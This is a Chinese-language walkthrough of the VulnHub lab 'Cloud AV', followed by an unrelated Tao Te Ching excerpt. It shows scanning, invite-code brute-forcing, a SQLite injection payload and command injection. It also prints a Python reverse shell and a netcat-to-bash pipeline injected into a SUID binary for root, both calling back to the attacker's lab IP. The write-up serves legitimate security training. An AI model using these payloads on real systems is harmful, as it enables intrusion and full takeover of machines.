Bootstrap

vulnhub靶场-BoredHackerBlog: Cloud AV

1、靶机信息

靶机名称:BOREDHACKERBLOG: CLOUD AV

靶机难度:简单

虚拟机环境:此靶机推荐使用Virtualbox搭建

描述:云防病毒扫描程序!是一种基于云的防病毒扫描服务。目前,它处于测试模式。系统已要求您测试安装程序并查找漏洞并升级权限。

靶机地址:BoredHackerBlog: Cloud AV ~ VulnHub

kali服务器IP

192.168.2.159

靶机IP

192.168.2.154

2、主机发现

通过使用arp协议对同一网段的靶机进行主机发现,扫描出192.168.2.154为我们目标靶机

arp-scan -l

3、端口扫描

通过使用nmap工具对全端口进行发现,再进行版本扫描,我们发现开放22,8080两个端口,并且得知22为ssh服务,8080为http服务

nmap -p- 192.168.2.154

nmap -sV -p 22,8080 192.168.2.154

4、Web信息收集

4.1 打开8080端口,页面显示这是一款云杀毒扫描器,输入邀请码后就可以开始测试。这时候有两种思路,一种是我们可以通过逻辑漏洞进行绕过,还有一种是进行暴力破解

4.2 使用burp进行暴力破解,通过查看返回长度,只有password的值长度与其他不同

4.3 输入密码 password 成功进入系统!

5、Sql注入

5.1 除了暴力破解的方式,其实这个提交处还存在一个注入点,首先尝试使用特殊符号,查看服务端处理结果,以此判定是否存在注入点,使用burp进行截包

5.2 使用Intruder功能,payload为各类特殊符号,在结果中发现 " 的返回长度与其他特殊符号不相同,且状态码为500,其余符号的状态码均为200

!@#$%^&*()_+{}|:"<>?

5.3 进入页面查看 " 的报错信息,发现是sqlite数据库报错,可以判断出此处存在注入点,并且我们在报错信息中发现,当提交一个双引号后,被拼接到一个sql查询语句中,我们提交的双引号与第一个双引号完成了闭合,提交到了服务器,查询的内容就是; +,而语句中本身存在的双引号没办法闭合,从而出现报错注入

select * from code where password="; + " + ";

5.4 得知sql语句后,我们注入一个永真的语句,前闭合后注释,成功进入系统,我们观察到此页面是一个Linuxls-l命令回显出来的结果

" or 1=1 --

6、命令执行

6.1 我们尝试进行命令执行,我这边使用了几个语句都可以 顺利执行

cat & id

cat | id

1111 || id

6.2 查看目标服务器是否有python环境,方便我们进行反弹shell

cat | which python

7、反弹shell

7.1 使用python语句反弹shell,成功反弹

cat | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.159",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

7.2 我们进入上一级目录,发现存在一个编译过的文件update_cloudav,以及源码文件update_cloudav.c,并且通过查看权限,发现文件拥有SUID权限,在用户执行该程序时,用户的权限是该程序文件属主的权限,也就是我们在执行该程序时将暂时获得root权限

7.3 查看c源代码文件,我们发现程序定义了一个执行参数,如果程序在执行中不包含参数,那么会打印出这段话:This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam;如果我们执行程序使用了参数,那么程序就会执行freshclam,运行病毒库更新

8、提权

8.1 在这里我们可以尝试执行此程序,并通过命令注入的方式,利用SUID权限,使用root权限执行命令,在这里我们输入参数1234,并使用nc反弹shell,最终拿到root权限!

./update_cloudav "1234 | nc 192.168.2.159 5555|/bin/bash|nc 192.168.2.159 6666"

悦读

道可道,非常道;名可名,非常名。 无名,天地之始,有名,万物之母。 故常无欲,以观其妙,常有欲,以观其徼。 此两者,同出而异名,同谓之玄,玄之又玄,众妙之门。

;